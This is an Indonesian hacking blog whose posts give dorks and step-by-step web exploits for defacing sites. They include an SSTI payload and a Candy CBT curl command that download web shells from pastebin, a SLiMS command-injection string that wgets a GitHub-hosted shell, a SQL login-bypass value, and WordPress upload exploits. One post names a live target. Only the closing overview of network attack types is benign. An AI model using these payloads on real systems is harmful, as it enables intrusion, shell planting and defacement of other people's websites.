Welcome To Security Darknet

Selamat Datang Di Official Security Darknet

Rabu, 30 Desember 2020

WordPress Plugin Adning Advertising (AFU)

Tags

 


WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload 

Google Dork:
inurl:/wp-content/plugins/angwp

Toolsnya


Usage? python3 exploit.py http://target.com/ shell.php

Akses?

http://target.com/yourfile.php

Thnks to Endang Alfarisi

@ncdream72@gmail.com

Jumat, 30 Oktober 2020

Ngebot Stater Pack

Tags
kali ini gua akan membagikan sebuah tools pack / installer yang didalamnya ada banyak tools/bot. gw tau kalian kgak punya skill jadinya harus ngebot.

Isi didalam toolsnya, kurang lebih ada 20 tools, kalian cek aja sendiri. download disini http://www.mediafire.com/

Password : security-darknet.or.id

Jangan lupa share artikel nya juga ajg.

Contact : ncdream72@gmail.com
©security-darknet.or.id

Selasa, 27 Oktober 2020

(Server-Side Template Injection) + (RCE)

Tags

 


Deface Poc SSTI to RCE


(Server-Side Template Injection) +  (Remote Code Execution)


Exploit : /actions/seomatic/meta-container/all-meta-containers?uri=


RCE Code = 


{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}


Itu link pastebin nya bisa lu ganti ke punya lu


Nama file = x.php

Password = aryaganteng

dork : site:*/humans.txt intext:SEOmatic

Paham ga kontol

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=


Kasih kode rce nya di belakang uri=

Seperti ini.

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}


Akses Shell
Site.com/namashell.php

Live Target :

https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=

Lebih jelas lagi.

https://youtu.be/nGjv-P_hhHg

Contact : ncdream72@gmail.com

Laravel RCE APP_KEY

Tags

 Laravel RCE via Web Apps


2.Masukkan target (perhatikan penggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini

*note:
Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... 

Laravel RCE via terminal ( CLI )
download tools
php rce.php url=http://target.com/ method=1


Source : nakanosec
Contact : ncdream72@gmail.com

Unauthentication RCE SuperWebMailer

Tags

Unauthentication RCE SuperWebMailer


Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)


habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini


Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah
https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution

Tags


RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1


Dork:

intext:"Powered By RiteCMS"


1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php


Ref? Rite Cms


Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

Tags

 


Deface Poc Computer Based Test RCE


Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Deface WordPress Orange Themes

Tags

 


Deface WordPress Orange Themes


Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme


Exploit :

/functions/upload-handler.php


Crsf Online :

https://blogpongo.com/csrf.php


Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error


Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes


Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian


Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html


contact : ncdream72@gmail.com

Slims command injection Upload Shell

Tags


Slims command injection Upload Shell

Google Dorks :
- inurl:/index.php?p=show_detail&id= 
- "Detail Cantuman" site:ac.id 
- "Powered By Slims7" site:ac.id

Payload:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?
terget.com/payload
target.com/path/payload

Akses Shell:
https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

SuperStoreFinder Wordpress Plugins Arbitrary File Upload

Tags

 


SuperStoreFinder Wordpress Plugins Arbitrary File Upload


Dork:

- SuperStoreFinder

- Inurl:superstorefinder-wp

- Inurl:superlogoshowcase-wp


SuperStoreFinder Exploit Upload Shell

https://pastebin.com/raw/pMuFWLLm

Usage:python filename.py http://google.com


Ref:

https://packetstormsecurity.com/files/159627/

Kocak Rdnm


still don't get it?

https://youtu.be/sPEJz6KvDbs


Contact : ncdream72@gmail.com

Rabu, 29 Juli 2020

Matrimonial Auth Bypass Admin Vulnerability

Tags
Matrimonial Auth Bypass Admin Vulnerability 

{+}Dork : inurl:"printprofile.php?id="

{+}U/p : '=''or'

• Dorking dulu webnya di google atau search engine lain
• Lalu kasi /admin/ contoh www.site.com/admin/

Tinggal Login dengan u/p diatas
Stelah login kalian klick web setting

Maka akan muncul tampilan seperti dibawah ini

Tinggal Lu edit2 kalo ga di jso aja.
Nyari tempat buat upshell? Cari sendiri jangan manja.

Sabtu, 22 Februari 2020

Mengenal Berbagai Jenis Serangan Pada Jaringan Komputer

Tags

Dengan berkembangnya teknologi keamanan jaringan ternyata tidak bisa menjamin sepenuhnya untuk melindungi sistem anda dari serangan attacker. Berbagai cara akan dilakukan attacker untuk dapat mengganggu sistem anda, seperti dengan cara membanjiri trafik pada jaringan sehingga dapat menghabiskan resource pada server anda dan server anda tidak bisa menjalankan fungsinya dengan baik.

Berikut adalah jenis-jenis serangan pada jaringan komputer yang biasa dilakukan oleh attacker

1. Spoofing
Teknik serangan yang dilakukan attacker dengan cara memalsukan data sehingga attacker dapat terlihat seperti host yang dapat dipercaya. Terdapat 3 jenis spoofing

IP spoofing adalah teknik yang digunakan dengan cara memalsukan source IP address sehingga ip address aslinya tidak dapat dilacak ketika pengiriman paket
DNS Spoofing adalah teknik yang digunakan untuk mengambil alih DNS server sehingga DNS dan IP address sebuah situs akan dialihkan ke server sang pelaku
Identity Spoofing adalah teknik penyusupan menggunakan identitas secara resmi untuk mengakses segala sesuatu dalam jaringan secara ilegal

2. DDoS (Distributed Denial of Service)
DOS (Denial of Service)
Merupakan jenis serangan terhadap server pada suatu jaringan dengan metode menghabiskan resource yang dimiliki server sampai server tersebut tidak dapat menjalankan fungsinya untuk memberikan akses layananya. Ada beberapa cara yang biasanya dilakukan attacker yaitu

Dengan cara membanjiri trafik dengan banyak data sehingga data dari host yang terdaftar tidak dapat masuk kedalam sistem
Dengan cara membanjiri trafik dengan banyaknya request terhadap server sehingga request dari host yang terdaftar tidak dapat dilayani oleh server
Mengganggu komunikasi antara server dengan host yang terdaftar dengan berbagai cara seperti salah satunya bisa dengan mengubah informasi konfigurasi sistem
DDOS (Distributed Denial of Service)
merupakan jenis serangan DOS yang menggunakan banyak host sekaligus untuk menyerang satu server sehingga dapat mengakibatkan server tidak dapat berfungsi bagi klien.

3. Packet Sniffing
Paket Sniffing merupakan teknik pencurian data dengan cara memonitoring dan menganalisis setiap paket data yang ditransmisikan dari klien ke server. biasanya attacker melakukan serangan ini menggunakan tools wireshark dan netcut untuk mencuri password dan pengambilan data-data penting lainya. Berikut merupakan tahap-tahap cara kerja paket sniffing

Collecting -> merubah interface yang digunakan menjadi promicius code dan kemudian mengelompokan paket data yang lewat melalui jaringan dalam bentuk raw binary

Conversion -> mengkonveriskan data binary kedalam data yang mudah dibaca/dipahami

Analysis -> setelah itu data diklasifikasikan kedalam blok protokol sesuai dengan sumber data tersebut
Pencurian Data-> Setelah data dikasifikasikan, maka attacker dapat mencuri datanya

4. DNS Poisoning
Merupakan Jenis serangan dengan cara memberikan informasi IP address yang palsu untuk mengalihkan trafik pada paket data dari tujuan yang sebenarnya. biasanya cara ini dipakai attacker untuk menyerang situs-situs ecommerce dan banking. attacker juga dapat membuat server palsu yang memiliki tampilan yang sama dengan situ yg sebenarnya. oleh karena itu diperlukan adanya digital certificate untuk mengamankanya agar server palsu tersebut dapat dibedakan dengan server aslinya yang memiliki digital certificate

5. Trojan Horse
Merupakan salah satu jenis Malicious software/malware yang dapat merusak sebuah sistem. Trojan ini dapat digunakan untuk memperoleh informasi dari target seperti password, system log dll, dan dapat memperoleh hak akses dari target. Trojan merupakan software yang berbeda dengan virus atau worm karena trojan ini bersifat stealth dalam beroperasi dan seolah-olah seperti program biasa yang tidak mencurigakan dan trojan juga bisa dikendalikan dari komputer lain (attacker). ada beberapa jenis trojan dan 3 diantaranya yaitu:

Pencuri Password -> jenis trojan ini dapat mencuri password yang disimpan didalam sistem dengan cara membuat tampilan seolah-olah tampilan login dengan menunggu host memasukan passwordnya pada saat login kemudian password tersebut akan dikirimkan ke attacker

Keylogger -> Jenis Trojan akan merekam semua yang diketikan oleh host dan mengirimkanya ke attacker.

RAT (Remote Administration Tools)-> Jenis trojan ini mampu mengambil alih kontrol secara penuh terhadap sistem dan dapat melakukan apapun yang attacker mau dari jarak jauh seperti memformat hardisk, mengedit dan menghapus data dll

6. SQL Injection
Sebuah Teknik serangan yang memanfaatkan celah keamanan dimana website mengijinkan user untuk menginput data tetapi tanpa adanya filter terhadap malicious character sehingga attacker bisa mendapatkan akses kedalam basis data sebuah aplikasi. inputan tersebut biasanya dimasukan kedalam bagian-bagian tertentu pada website yang berhubungan dengan database dari situs tersebut. attacker biasanya memasukan data link yang mengarahkan korban menuju website yang digunakan attacker untuk mengambil informasi/data pribadi dari korban.

Demikian sekilas tentang berbagai macam jenis serangan yang ada pada jaringan komputer, Semoga bermanfaat.

Source: netsec.id

Referensi:

SQL_injection - Wiki

DNS_spoofing - Wiki

Trojan_Horse - Wiki